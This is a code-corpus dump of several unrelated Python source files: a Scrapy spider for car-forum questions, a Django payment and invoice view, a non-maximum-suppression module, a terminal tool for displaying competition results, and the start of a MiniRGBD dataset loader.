{"api_name": "verbose.verbose", "line_number": 366, "usage_type": "name"}, {"api_name": "covid.ABBREV_CONTINENTS", "line_number": 371, "usage_type": "attribute"}, {"api_name": "spikevariants.SpikeVariants.from_colormut", "line_number": 381, "usage_type": "call"}, {"api_name": "spikevariants.SpikeVariants", "line_number": 381, "usage_type": "name"}, {"api_name": "spikevariants.SpikeVariants.default", "line_number": 383, "usage_type": "call"}, {"api_name": "spikevariants.SpikeVariants", "line_number": 383, "usage_type": "name"}, {"api_name": "verbose.verbose.name", "line_number": 386, "usage_type": "attribute"}, {"api_name": "verbose.verbose", "line_number": 386, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 389, "usage_type": "call"}, {"api_name": "sequtil.relativename", "line_number": 399, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 409, "usage_type": "call"}, {"api_name": "verbose.verbose.verbosity", "line_number": 421, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 421, "usage_type": "name"}, {"api_name": "wrapgen.keepcount", "line_number": 425, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 431, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 431, "usage_type": "name"}]} +{"seq_id": "41470634134", "text": "#!/usr/bin/env python\n# coding=utf-8\n\nfrom scrapy.selector import Selector\nfrom scrapy.http import Request, Response\nfrom AutoComments.items import AutocommentsItem\nimport scrapy\n\ncount = 0\n\n\nclass Autohome2Spider(scrapy.Spider):\n\tname = \"autohome_spider\"\n\tprefix = 'http://wenda.autohome.com.cn'\n\tstart_urls = ['http://wenda.autohome.com.cn/topic/list-1-0-0-0-0-1', ]\n\n\t# 'http://wenda.autohome.com.cn/topic/list-2-0-0-0-0-1',\\\n\t# 'http://wenda.autohome.com.cn/topic/list-3-0-0-0-0-1',\\\n\t# 'http://wenda.autohome.com.cn/topic/list-4-0-0-0-0-1']\n\n\tdef parse(self, response):\n\t\tselector = Selector(response)\n\t\tprint('****************parse request url: %s status_code : %s ****************' % (\n\t\tselector.response.url, str(selector.response.status)))\n\t\tl2_urls = selector.xpath('//div[@class=\"classify\"][2]//div/a')\n\t\tif l2_urls:\n\t\t\tfor l2_url in l2_urls:\n\t\t\t\turl = self.prefix + l2_url.xpath('./@href').extract()[0]\n\t\t\t\tprint('****************请求 二级 标签首页: %s****************' % url)\n\t\t\t\tyield Request(url=url, callback=self.gen_all_reqs)\n\t\telse:\n\t\t\tprint('****************解析 一级 标签首页: %s****************' % selector.response.url)\n\t\t\tyield Request(url=selector.response.url, callback=self.parse_detail)\n\n\tdef gen_all_reqs(self, response):\n\t\tselector = Selector(response)\n\t\tprint('****************gen_all_reqs: request url: %s status_code : %s ****************' % (\n\t\tselector.response.url, str(selector.response.status)))\n\t\tl3_urls = selector.xpath('//div[@class=\"classify\"][3]//div/a')\n\t\tif l3_urls:\n\t\t\tfor l3_url in l3_urls:\n\t\t\t\turl = self.prefix + l3_url.xpath('./@href').extract()[0]\n\t\t\t\tprint('****************解析 三级 标签首页: %s****************' % url)\n\t\t\t\tyield Request(url=url, callback=self.parse_detail)\n\t\telse:\n\t\t\tprint('****************解析 二级 标签首页: %s****************' % selector.response.url)\n\t\t\tyield Request(url=selector.response.url, callback=self.parse_detail)\n\n\tdef parse_detail(self, response):\n\t\tglobal count\n\t\titem = AutocommentsItem()\n\t\tselector = Selector(response)\n\t\tprint('****************parse_detail request url: %s status_code : %s ****************' % (\n\t\tselector.response.url, str(selector.response.status)))\n\n\t\tprint('*********************开始抓取第 %d 页 %s 信息, status : %s' % (\n\t\tcount, selector.response.request, selector.response.status))\n\n\t\tl1_label = selector.xpath(\n\t\t\t'/html/body/div[3]/div/div[1]/div[1]/div[2]/div/a/span/em[@class=\"current\"]/text()').extract()\n\t\tif l1_label:\n\t\t\titem['l1label'] = l1_label[0]\n\t\telse:\n\t\t\titem['l1label'] = ''\n\n\t\tl2_label = selector.xpath(\n\t\t\t'/html/body/div[3]/div/div[1]/div[1]/div[3]/div/a/span/em[@class=\"current\"]/text()').extract()\n\t\tif l2_label:\n\t\t\titem['l2label'] = l2_label[0]\n\t\telse:\n\t\t\titem['l2label'] = ''\n\n\t\tl3_label = selector.xpath(\n\t\t\t'/html/body/div[3]/div/div[1]/div[1]/div[4]/div/a/span/em[@class=\"current\"]/text()').extract()\n\t\tif l3_label:\n\t\t\titem['l3label'] = l3_label[0]\n\t\telse:\n\t\t\titem['l3label'] = ''\n\n\t\tquestionlist = selector.xpath('/html/body/div[3]/div/div[1]/div[2]/ul/li/h4/a/text()').extract()\n\t\tprint(\"****************完成抓取 %d 页信息 %s | L1: %s | L2: %s | L3:%s****************\" % (\n\t\tcount, selector.response.url, item['l1label'], item['l2label'], item['l3label']))\n\t\tcount += 1\n\t\tif questionlist:\n\t\t\tprint(len(questionlist))\n\t\t\tfor question in questionlist:\n\t\t\t\titem['question'] = question\n\t\t\t\tyield item\n\t\tnextlink = selector.xpath('//a[@class=\"athm-page__next\"]/@href').extract()\n\t\tif nextlink:\n\t\t\tnextlink = self.prefix + nextlink[0]\n\t\t\tprint('****************开始解析下一页 %s 信息****************' % nextlink)\n\t\t\tyield Request(url=nextlink, callback=self.parse_detail)\n", "repo_name": "Cai1001/PythonScrapyProj", "sub_path": "AutoHomeSpider_v1.2/AutoComments/spiders/spider.py", "file_name": "spider.py", "file_ext": "py", "file_size_in_byte": 3667, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "scrapy.Spider", "line_number": 12, "usage_type": "attribute"}, {"api_name": "scrapy.selector.Selector", "line_number": 22, "usage_type": "call"}, {"api_name": "scrapy.http.Request", "line_number": 30, "usage_type": "call"}, {"api_name": "scrapy.http.Request", "line_number": 33, "usage_type": "call"}, {"api_name": "scrapy.selector.Selector", "line_number": 36, "usage_type": "call"}, {"api_name": "scrapy.http.Request", "line_number": 44, "usage_type": "call"}, {"api_name": "scrapy.http.Request", "line_number": 47, "usage_type": "call"}, {"api_name": "AutoComments.items.AutocommentsItem", "line_number": 51, "usage_type": "call"}, {"api_name": "scrapy.selector.Selector", "line_number": 52, "usage_type": "call"}, {"api_name": "scrapy.http.Request", "line_number": 93, "usage_type": "call"}]} +{"seq_id": "10757933047", "text": "from django.shortcuts import render, redirect\nfrom .models import PaymentGateway, Invoice, InvoiceDetails\nfrom product_module.models import CartItem, Product,Tax,Shipping_Cost\nfrom datetime import date, datetime\nfrom django.db import transaction\nfrom django.urls import reverse\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.template.loader import render_to_string\nfrom django.utils.html import strip_tags\nfrom django.conf import settings\nfrom django.utils.html import mark_safe\nfrom mail_templated import send_mail\n# Create your views here.\ndef confirmpayment(request):\n\tif request.method == \"POST\":\n\t\ttoken = request.POST.get(\"token\")\n\t\tamount = request.POST.get(\"amount\")\n\t\tcity = request.POST.get(\"city\")\n\t\taddress = request.POST.get(\"address\")\n\t\tcontact_no = request.POST.get(\"contact_no\")\n\t\t# clean up\n\t\ttoken = token.strip()\n\t\tamount = float(amount)\n\t\ttry:\n\t\t\twith transaction.atomic():\n\t\t\t\t# open an atomic transaction, i.e. all successful or none\n\t\t\t\tmake_payment(token, amount)\n\t\t\t\tmaintain_invoice(request, token, amount,city,address,contact_no)\n\t\texcept Exception as e:\n\t\t\trequest.session[\"message\"] = str(e)\n\t\t\treturn redirect(reverse('error_page'))\n\t\telse:\n\t\t\trequest.session[\"message\"] = f\"Payment successfully completed with NRs. {amount} from your balance!\"\n\t\t\treturn redirect(reverse('success_page'))\ndef make_payment(token, amount):\n\ttry:\n\t\tpayment_gateway = PaymentGateway.objects.get(token=token)\n\texcept:\n\t\traise Exception(f\"Invalid token '{token}'\")\n\t# Check if available amount is sufficient for payment\n\tif payment_gateway.balance < amount:\n\t\traise Exception(\"Insufficient balance\")\n\t# check for expiry date\n\tif payment_gateway.expiry_date < date.today():\n\t\traise Exception(\"Token has expired\")\n\t# deduct amount and save\n\tpayment_gateway.balance -= amount\n\tpayment_gateway.save()\n\ndef maintain_invoice(request, token, amount, city,address,contact_no):\n\t# retrieve cart items\n\tcart_items = CartItem.objects.filter(user=request.user)\n\t# save invoice\n\tinvoice = Invoice(\n\tuser = request.user,\n\ttoken = token,\n\ttotal_amount = amount,\n\tcity=city,\n\taddress=address,\n\tcontact_no = contact_no,\n\tpayment_date = datetime.now()\n\t)\n\tinvoice.save()\n\t# invoic_id = Invoice.objects.filter(user=request.user)\n\tfkid = invoice.id\n\t# save invoice detail\n\tfor cart_item in cart_items:\n\t\tinvoice_detail = InvoiceDetails(\n\t\tinvoice = invoice,\n\t\tproduct = cart_item.product,\n\t\tquantity = cart_item.quantity,\n\t\tsub_amount = cart_item.quantity * cart_item.product.price\n\t\t)\n\t\tinvoice_detail.save()\n\n\t# adjust product quantity and clear cart\n\tfor cart_item in cart_items:\n\t# reduce quantity from Product\n\t\tproduct = Product.objects.get(id=cart_item.product.id)\n\t\tif product.quantity < cart_item.quantity:\n\t\t\traise Exception(f\"Insufficient quantity {cart_item.quantity} for {product.name}\")\n\t\tproduct.quantity -= cart_item.quantity\n\t\tproduct.save()\n\t# clear cart for the user\n\t\tcart_item.delete()\n\torder_confirmation(request,fkid)\ndef order_confirmation(request,fkid):\n tax = Tax.objects.get(pk=1)\n invoice = Invoice.objects.get(pk=fkid)\n shipping = Shipping_Cost.objects.get(pk=1)\n invoice_details = InvoiceDetails.objects.filter(invoice_id=fkid)\n total =0\n for invoice_detail in invoice_details:\n total +=invoice_detail.sub_amount\n tax_amount =total*(tax.tax_rate_in_percentage/100)\n user = request.user\n send_mail('bill.tpl', {'user': user,'invoice_details':invoice_details,'tax':tax,'tax_amount':tax_amount,'shipping':shipping,'invoice':invoice}, settings.EMAIL_HOST_USER, [user.email])\n # product=[]\n # text_content = \" \"\n # for invoice_detail in invoice_details:\n # text_content = f\"Name:{invoice_detail.product}\" \n\n # current_user = request.user\n # email = current_user.email\n # html_content = mark_safe(f\"{}\")\n # # text_content = strip_tags(html_content)\n\n # email = EmailMultiAlternatives(\n # \"Testing\",\n # html_content,\n # settings.EMAIL_HOST_USER,\n # [email]\n\n # )\n # email.attach_alternative(html_content,\"text/html\")\n # email.send()", "repo_name": "ayushkc007/Kitab_pasal", "sub_path": "ecommerce_project/payment_module/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4058, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.db.transaction.atomic", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.transaction", "line_number": 25, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 31, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 31, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 34, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 34, "usage_type": "call"}, {"api_name": "models.PaymentGateway.objects.get", "line_number": 37, "usage_type": "call"}, {"api_name": "models.PaymentGateway.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "models.PaymentGateway", "line_number": 37, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 44, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 44, "usage_type": "name"}, {"api_name": "product_module.models.CartItem.objects.filter", "line_number": 52, "usage_type": "call"}, {"api_name": "product_module.models.CartItem.objects", "line_number": 52, "usage_type": "attribute"}, {"api_name": "product_module.models.CartItem", "line_number": 52, "usage_type": "name"}, {"api_name": "models.Invoice", "line_number": 54, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 61, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 61, "usage_type": "name"}, {"api_name": "models.InvoiceDetails", "line_number": 68, "usage_type": "call"}, {"api_name": "product_module.models.Product.objects.get", "line_number": 79, "usage_type": "call"}, {"api_name": "product_module.models.Product.objects", "line_number": 79, "usage_type": "attribute"}, {"api_name": "product_module.models.Product", "line_number": 79, "usage_type": "name"}, {"api_name": "product_module.models.Tax.objects.get", "line_number": 88, "usage_type": "call"}, {"api_name": "product_module.models.Tax.objects", "line_number": 88, "usage_type": "attribute"}, {"api_name": "product_module.models.Tax", "line_number": 88, "usage_type": "name"}, {"api_name": "models.Invoice.objects.get", "line_number": 89, "usage_type": "call"}, {"api_name": "models.Invoice.objects", "line_number": 89, "usage_type": "attribute"}, {"api_name": "models.Invoice", "line_number": 89, "usage_type": "name"}, {"api_name": "product_module.models.Shipping_Cost.objects.get", "line_number": 90, "usage_type": "call"}, {"api_name": "product_module.models.Shipping_Cost.objects", "line_number": 90, "usage_type": "attribute"}, {"api_name": "product_module.models.Shipping_Cost", "line_number": 90, "usage_type": "name"}, {"api_name": "models.InvoiceDetails.objects.filter", "line_number": 91, "usage_type": "call"}, {"api_name": "models.InvoiceDetails.objects", "line_number": 91, "usage_type": "attribute"}, {"api_name": "models.InvoiceDetails", "line_number": 91, "usage_type": "name"}, {"api_name": "mail_templated.send_mail", "line_number": 97, "usage_type": "call"}, {"api_name": "django.conf.settings.EMAIL_HOST_USER", "line_number": 97, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 97, "usage_type": "name"}]} +{"seq_id": "74287434754", "text": "\"\"\"\n.. module:: felzenszwalb\n :synopsis: Felzenszwalb et al implementation of NMS\n\n.. moduleauthor:: tom hoag \n\nFelzenszwalb et al implementation of NMS\n\nThe functions in this module are not usually called directly. Instead use :func:`nms.nms.boxes`,\n:func:`nms.nms.rboxess`, or :func:`nms.nms.polygons`\n\n\n\"\"\"\nimport numpy as np\nimport cv2\n\nimport nms.helpers as help\n\n\ndef rect_areas(rects):\n \"\"\"Return an np.array of the areas of the rectangles\n\n :param rects: a list of rectangles, each specified as (x, y, w, h)\n :type rects: list\n :return: an numpy array of corresponding areas\n :rtype: :class:`numpy.ndarray`\n \"\"\"\n # rect = x,y,w,h\n rects = np.array(rects)\n w = rects[:,2]\n h = rects[:,3]\n return w * h\n\n\ndef rect_compare(rect1, rect2, area):\n \"\"\"Calculate the ratio of overlap between two rectangles and the given area\n\n :param rect1: rectangle specified as (x, y, w, h)\n :type rect1: tuple\n :param rect2: rectangle specificed as (x, y, w, h)\n :type rect2: tuple\n :param area: the area to compare to\n :type area: float\n :return: the ratio of the overlap of rect1 and rect2 to the area, e.g overlap(rect1, rect2)/area\n :rtype: float\n \"\"\"\n # rect = x,y, w, h\n xx1 = max(rect1[0], rect2[0])\n yy1 = max(rect1[1], rect2[1])\n xx2 = min(rect1[0] + rect1[2], rect2[0] + rect2[2])\n yy2 = min(rect1[1] + rect1[3], rect2[1] + rect2[3])\n w = max(0, xx2 - xx1 + 1)\n h = max(0, yy2 - yy1 + 1)\n return float(w * h) / area\n\n\ndef poly_areas(polys):\n \"\"\"Calculate the area of each polygon in polys\n\n :param polys: a list of polygons, each specified by its verticies\n :type polys: list\n :return: a list of areas corresponding the list of polygons\n :rtype: list\n \"\"\"\n areas = []\n for poly in polys:\n areas.append(cv2.contourArea(np.array(poly, np.int32)))\n return areas\n\n\ndef poly_compare(poly1, poly2, area):\n \"\"\"Calculate the ratio of overlap between two polygons and the given area\n\n :param poly1: polygon specified by its verticies\n :type poly1: list\n :param poly2: polygon specified by its verticies\n :type poly2: list\n :param area: the area to compare the overlap of poly1 and poly2\n :type area: float\n :return: the ratio of overlap of poly1 and poly2 to the area e.g. overlap(poly1, poly2)/area\n :rtype: float\n \"\"\"\n assert area > 0\n intersection_area = help.polygon_intersection_area([poly1, poly2])\n return intersection_area/area\n\n\ndef nms(boxes, scores, **kwargs):\n \"\"\"NMS using Felzenszwalb et al. method\n\n Adapted from non_max_suppression_slow(boxes, overlapThresh) from\n `Non-Maximum Suppression for Object Detection in Python `_\n\n This function is not usually called directly. Instead use :func:`nms.nms.boxes`, :func:`nms.nms.rboxes`,\n or :func:`nms.nms.polygons` and set `nms_algorithm=nms.felzenszwalb`\n\n :param boxes: a list of boxes to perform NMS on\n :type boxes: list\n :param scores: a list of scores corresponding to boxes\n :type scores: list\n :param kwargs: optional keyword parameters (see below)\n :type kwargs: dict (see below)\n :return: a list of the indicies of the best boxes\n :rtype: list\n\n :kwargs:\n\n - top_k (int): if >0, keep at most top_k picked indices. default:0, int\n - score_threshold (float): the minimum score necessary to be a viable solution, default 0.3, float\n - nms_threshold (float): the minimum nms value to be a viable solution, default: 0.4, float\n - compare_function (function): function that accepts two boxes and returns their overlap ratio, this function must\n accept two boxes and return an overlap ratio between 0 and 1\n - area_function (function): function used to calculate the area of an element of boxes\n \"\"\"\n\n if 'top_k' in kwargs:\n top_k = kwargs['top_k']\n else:\n top_k = 0\n assert 0 <= top_k\n\n if 'score_threshold' in kwargs:\n score_threshold = kwargs['score_threshold']\n else:\n score_threshold = 0.3\n assert 0 < score_threshold\n\n if 'nms_threshold' in kwargs:\n nms_threshold = kwargs['nms_threshold']\n else:\n nms_threshold = 0.4\n assert 0 < nms_threshold < 1\n\n if 'compare_function' in kwargs:\n compare_function = kwargs['compare_function']\n else:\n compare_function = None\n assert compare_function is not None\n\n if 'area_function' in kwargs:\n area_function = kwargs['area_function']\n else:\n area_function = None\n assert area_function is not None\n\n # if there are no boxes, return an empty list\n if len(boxes) == 0:\n return []\n\n if scores is not None:\n assert len(scores) == len(boxes)\n\n # initialize the list of picked indexes\n pick = []\n\n # compute the area of the bounding boxes\n area = area_function(boxes)\n\n # sort the boxes by score or the bottom-right y-coordinate of the bounding box\n if scores is not None:\n # sort the bounding boxes by the associated scores\n scores = help.get_max_score_index(scores, score_threshold, top_k, False)\n idxs = np.array(scores, np.int32)[:,1]\n #idxs = np.argsort(scores)\n else:\n # sort the bounding boxes by the bottom-right y-coordinate of the bounding box\n y2 = boxes[:3]\n idxs = np.argsort(y2)\n\n # keep looping while some indexes still remain in the indexes list\n while len(idxs) > 0:\n # grab the last index in the indexes list, add the index\n # value to the list of picked indexes, then initialize\n # the suppression list (i.e. indexes that will be deleted)\n # using the last index\n last = len(idxs) - 1\n i = idxs[last]\n pick.append(i)\n suppress = [last]\n\n # loop over all indexes in the indexes list\n for pos in range(0, last):\n # grab the current index\n j = idxs[pos]\n\n # compute the ratio of overlap between the two boxes and the area of the second box\n overlap = compare_function(boxes[i], boxes[j], area[j])\n\n # if there is sufficient overlap, suppress the current bounding box\n if overlap > nms_threshold:\n suppress.append(pos)\n\n # delete all indexes from the index list that are in the suppression list\n idxs = np.delete(idxs, suppress)\n\n # return only the indicies of the bounding boxes that were picked\n return pick\n", "repo_name": "ChenNuode/Runner-tag-tracker--Capstone--", "sub_path": "bigtest/lib/python3.6/site-packages/nms/felzenszwalb.py", "file_name": "felzenszwalb.py", "file_ext": "py", "file_size_in_byte": 6542, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.array", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.contourArea", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 67, "usage_type": "attribute"}, {"api_name": "nms.helpers.polygon_intersection_area", "line_number": 84, "usage_type": "call"}, {"api_name": "nms.helpers", "line_number": 84, "usage_type": "name"}, {"api_name": "nms.helpers.get_max_score_index", "line_number": 162, "usage_type": "call"}, {"api_name": "nms.helpers", "line_number": 162, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 163, "usage_type": "attribute"}, {"api_name": "numpy.argsort", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 194, "usage_type": "call"}]} +{"seq_id": "35491856273", "text": "#colorama allows usage of escape chars on any platform\n#install it with \"pip install colorama\"\n\nCOLORAMA = False\ntry:\n import colorama\n from colorama import init,Fore,Back,deinit\n init()\n COLORAMA = True\nexcept ImportError:\n print(\"Working without colorama, no colors available\")\n \n#file locations, change them here if you want\nRESULTSFILE = \"results.txt\"\nLINEFILE = \"resultsline.txt\"\n\n# windows key representations\nWIN_UP_ARROW = b'H'\nWIN_DOWN_ARROW = b'P'\nWIN_ENTER = b'\\r' \nWIN_SPACE = b' '\nWIN_SPECIAL_CHAR = b'\\xe0'\nWIN_EXIT = b'\\x03'\n\nLIN_ENTER = '\\r'\nLIN_SPECIAL_CHAR = \"\\x1b\"\nLIN_UP_ARROW = \"A\"\nLIN_DOWN_ARROW = \"B\"\nLIN_SPACE = \" \"\nLIN_EXIT = '\\x03'\n\n\n\n#escape codes for custom behavior in terminal\nCLEAR = '\\033[2J'\nRESETTEXT = '\\033[0m'\nif not COLORAMA:\n RESETTEXT = ''\n CLEAR = '\\n\\n\\n\\n\\n'\n\n\ndef main():\n #get the result info \n print(CLEAR + \"Getting lines from file.\")\n compData = open(RESULTSFILE, \"r\")\n compInfo = compData.readlines()\n compData.close()\n \n \n #clears the file used \n clearTextFile()\n \n dqMarker = -1\n num = 0\n\n print(\"Checking for correct formatting (DQ empty line).\")\n for compLine in compInfo:\n num += 1\n if compLine.strip() == \"\":\n dqMarker = num\n break\n \n assert dqMarker != -1, \"Empty line not found before DQs! Exiting...\"\n\n dqMarker-=1\n \n compInfo.pop(dqMarker)\n compInfo = reverseArray(compInfo, dqMarker)\n \n \n print(\"Ready to start printing info, press Enter to start.\")\n \n print(\"\\nTotal Entrants:\", len(compInfo),\"\\nNon-DQs:\", end=\" \")\n print(dqMarker,\"\\nDQs:\",len(compInfo) - dqMarker)\n \n i=0\n for line in compInfo:\n if i >= dqMarker and COLORAMA:\n print(Back.RED, end=\"\")\n if line.strip() == \"\":\n print(\"(empty line)\", end=\"\")\n print(line.strip() + RESETTEXT)\n i+=1\n \n input()\n print(CLEAR, end=\"\")\n \n startComp(compInfo, dqMarker)\n \n writeTextToResults(\"Thanks for watching!\")\n \n print(CLEAR)\n print(\"Printed 'Thanks for watching!'\\n\\nPress Enter to exit.\")\n input()\n print(CLEAR)\n \n clearTextFile()\n \ndef startComp(compInfo, dqMarker):\n \"\"\"\n loops over the array compInfo, displaying all the results at once\n with the current placing highlighted. Pressing Enter moves on to\n the next placing. All placings after the int dqMarker in the array\n are displayed on a red background to differentiate them.\n \"\"\"\n \n #loop over the array for every entry in it\n currentSpot = 0\n while currentSpot < len(compInfo):\n print(CLEAR, end=\"\")\n #display every entry in the array by looping over it\n i = 0\n for compLine in compInfo:\n \n #replace characters that don't show up in some fonts\n compLine = compLine.replace('“','\"').replace('”','\"').replace(\"’\",\"'\").strip()\n \n #if the line is a DQ display it with a red background\n if i >= dqMarker and COLORAMA:\n print(Back.RED,end=\"\")\n \n # if the current placing is up, display it on a white background with black text\n if i == currentSpot:\n if COLORAMA:\n print(Back.WHITE + Fore.BLACK + \">\", end=\"\")\n else:\n print(\"\\n>>>>\",end=\"\")\n compOutput = compLine\n \n #if it is over the length, cut off some data at the end\n if len(compLine) > 64:\n compOutput = compOutput[:64]\n compOutput = compOutput[:compOutput.rfind(\" \")]\n compOutput += \"...\"\n \n #write output to the line file\n writeTextToResults(compOutput)\n if compLine.strip() == \"\":\n print(\"(Empty line)\",end=\"\")\n #print line and reset text styles\n print(compLine + RESETTEXT)\n i += 1\n \n #wait until the user presses a button to continue\n var = waitForInput()\n if var >= 0:\n currentSpot += var\n elif currentSpot > 0:\n currentSpot += var\n\ndef writeTextToResults(text):\n \"\"\"sets the resultsline file to the inputted text\"\"\"\n compData = open(LINEFILE, \"w\")\n compData.write(text.strip())\n compData.close()\n \ndef clearTextFile():\n \"\"\"clears the results text file\"\"\"\n writeTextToResults(\"\")\n \ndef reverseArray(data, dqMarker):\n \"\"\"\n reverses the contents of the array 'data'\n before the spot marked by the int dqMarker\n \n returns the array after reversing it\n \"\"\"\n print(\"Reversing array\")\n temp = -1\n counter = 0\n \n #iterate through the list until halfway point (not counting dqs)\n #swapping 1st and last to be able to see in reverse order\n while counter < (dqMarker // 2):\n temp = data[counter]\n data[counter] = data[dqMarker - counter - 1]\n data[dqMarker - counter - 1] = temp\n counter += 1\n \n return data\n\ndef waitForInput():\n \"\"\"\n\twaits for valid input, then returns the approximate change\n to currentSpot based on the input. Handles Windows and linux.\n\t\"\"\"\n if os_type == \"WIN\":\n c = b''\n while True:\n c = getch()\n if (c == WIN_ENTER):\n return 1\n elif (c == WIN_SPECIAL_CHAR):\n c = getch()\n if (c == WIN_UP_ARROW):\n return -1\n elif (c == WIN_DOWN_ARROW):\n return 1\n elif (c == WIN_EXIT):\n if COLORAMA:\n deinit()\n raise KeyboardInterrupt()\n else:\n c = \"\"\n while True:\n c = getch()\n if c == LIN_EXIT:\n if COLORAMA:\n deinit()\n raise KeyboardInterrupt()\n if c == LIN_ENTER:\n return 1\n if c == LIN_SPECIAL_CHAR:\n getch()\n c = getch()\n if c == LIN_DOWN_ARROW:\n return 1\n if c == LIN_UP_ARROW:\n return -1\n \ndef _find_getch():\n try:\n import termios\n except ImportError:\n # Non-POSIX. Return msvcrt's (Windows') getch.\n import msvcrt\n return msvcrt.getch, \"WIN\"\n\n # POSIX system. Create and return a getch that manipulates the tty.\n import sys, tty\n def _getch():\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n try:\n tty.setraw(fd)\n ch = sys.stdin.read(1)\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n return ch\n\n return _getch,\"LIN\"\n\ngetch, os_type = _find_getch()\n \nmain()\n\nif COLORAMA:\n deinit()", "repo_name": "1ted59/Competition-Results", "sub_path": "Competition.py", "file_name": "Competition.py", "file_ext": "py", "file_size_in_byte": 6905, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "colorama.init", "line_number": 8, "usage_type": "call"}, {"api_name": "colorama.Back.RED", "line_number": 79, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 79, "usage_type": "name"}, {"api_name": "colorama.Back.RED", "line_number": 120, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 120, "usage_type": "name"}, {"api_name": "colorama.Back.WHITE", "line_number": 125, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 125, "usage_type": "name"}, {"api_name": "colorama.Fore.BLACK", "line_number": 125, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 125, "usage_type": "name"}, {"api_name": "colorama.deinit", "line_number": 201, "usage_type": "call"}, {"api_name": "colorama.deinit", "line_number": 209, "usage_type": "call"}, {"api_name": "msvcrt.getch", "line_number": 227, "usage_type": "attribute"}, {"api_name": "sys.stdin.fileno", "line_number": 232, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 232, "usage_type": "attribute"}, {"api_name": "termios.tcgetattr", "line_number": 233, "usage_type": "call"}, {"api_name": "tty.setraw", "line_number": 235, "usage_type": "call"}, {"api_name": "sys.stdin.read", "line_number": 236, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 236, "usage_type": "attribute"}, {"api_name": "termios.tcsetattr", "line_number": 238, "usage_type": "call"}, {"api_name": "termios.TCSADRAIN", "line_number": 238, "usage_type": "attribute"}, {"api_name": "colorama.deinit", "line_number": 248, "usage_type": "call"}]} +{"seq_id": "36755201264", "text": "import os\nfrom PIL import Image\nimport sys\nfrom concurrent.futures import ProcessPoolExecutor\nimport psutil\nimport time\nimport numpy as np\nimport torch.utils.data\nimport matplotlib.pyplot as plt\n\n\n\n\ndef timing(f):\n def wrap(*args, **kwargs):\n time1 = time.time()\n ret = f(*args, **kwargs)\n time2 = time.time()\n print('{:s} function took {:.3f} ms'.format(f.__name__, time2-time1))\n return ret\n return wrap\n\n\n\nclass MiniRGBD(object):\n class Folders:\n depth = 'depth'\n rgb = 'rgb'\n fg_mask = 'fg_mask'\n joints_2d = 'joints_2Ddep'\n joints_3d = 'joints_3D'\n smil_params_folder = 'smil_params' # unused as of yet\n\n def __init__(self, dirnum):\n dir = dirnum[0]\n num = dirnum[1]\n\n # Save original file paths\n self._depth_file = os.path.join(dir, MiniRGBD.Folders.depth, 'syn_' + num + '_depth.png')\n self._rgb_file = os.path.join(dir, MiniRGBD.Folders.rgb, 'syn_' + num + '.png')\n self._fg_mask_file = os.path.join(dir, MiniRGBD.Folders.fg_mask, 'mask_' + num + '.png')\n self._joints_2d_file = os.path.join(dir, MiniRGBD.Folders.joints_2d, 'syn_joints_2Ddep_' + num + '.txt')\n self._joints_3d_file = os.path.join(dir, MiniRGBD.Folders.joints_3d, 'syn_joints_3D_' + num + '.txt')\n\n # Open images.\n depth = Image.open(self._depth_file)\n rgb = Image.open(self._rgb_file)\n fg = Image.open(self._fg_mask_file)\n self._bbox = fg.getbbox()\n\n # Store only the nonzero region.\n self._fg_mask = fg.crop(self._bbox)\n self._depth = Image.new(depth.mode, self._fg_mask.size)\n self._rgb = Image.new(rgb.mode, self._fg_mask.size)\n\n self._depth.paste(depth.crop(self._bbox), mask=self._fg_mask)\n self._rgb.paste(rgb.crop(self._bbox), mask=self._fg_mask)\n\n # Finally, load and store the joint values.\n def extract_joints(_joints_file):\n num_joints = 24 # Number of joints annotated in each frame.\n joints = []\n with open(_joints_file, 'r') as joints_file:\n for idx, line in enumerate(joints_file.readlines()):\n x, y, z, joint_id = line.split()\n x, y, z, joint_id = float(x), float(y), float(z), int(joint_id)\n joints.append((x, y, z))\n assert (joint_id == idx) # Check that data format is always the same.\n assert (idx == num_joints) # Make sure that all joints are present.\n return joints\n\n # Extract joints values\n self.joints_2d = extract_joints(self._joints_2d_file)\n self.joints_3d = extract_joints(self._joints_3d_file)\n\n @staticmethod\n def _thumbnail(img, thumbnail_size):\n # Since thumbnail preserves aspect ratio, it's size will be\n img = 